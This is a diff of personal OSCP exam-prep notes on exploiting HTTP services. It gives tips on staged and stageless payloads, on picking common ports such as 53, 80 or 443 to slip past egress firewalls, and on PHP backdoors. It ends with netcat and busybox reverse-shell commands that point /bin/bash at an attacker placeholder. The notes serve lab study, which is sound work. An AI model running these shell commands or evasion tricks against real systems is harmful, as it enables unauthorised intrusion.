OoStellarnightoO/OSCP_Notes/03 - Service_Enumeration/80_443-HTTP_HTTPS.md

  if your shell is part of a multi staged exploit i.e where the exploit script downloads the shell file from you and then executes it on the target, see if the exploit script has a sleep function. lengthen the sleep function to like 10 seconds or something because it takes a while to fully download your shell script

+If you have doubts about whether the target is able to reach your HTTP server, you can always check if you received a GET request on your HTTP server tab/terminal.
+Using Wireshark is also another way to monitor if the target is able to communicate with your machine.

+*From experience, whenever possible, always use a stageless payload for OSCP as it usually works if you have the ability to execute a file

-- some boxes have firewalls rules so you may need to change your revshell lport to something common like port 80 or 443 to be safe. you can also consider using existing open ports on the target (egress traffic might be open)
+- some boxes have firewalls rules so you may need to change your revshell lport to something common like port 53, 80 or 443 to be safe. you can also consider using existing open ports on the target (egress traffic might be open)

 - For Wordpress, uploaded stuff are usually in wp-content

 - sometimes a direct php revshell would not work.
 Try a php backdoor shell first and then use it to execute a netcat reverse shell

 - is your nc rev shell not working? perhaps the nc on the system is an older version and does not support the -e flag.
-    - To test this, try just running nc <attacker ip> <port>.
+    - To test this, try just running `nc <attacker ip> <port>`.
 If you get a connection back, then do the following and you should get a nc revshell

 ```bash
 busybox nc <attacker ip> <port> -e /bin/bash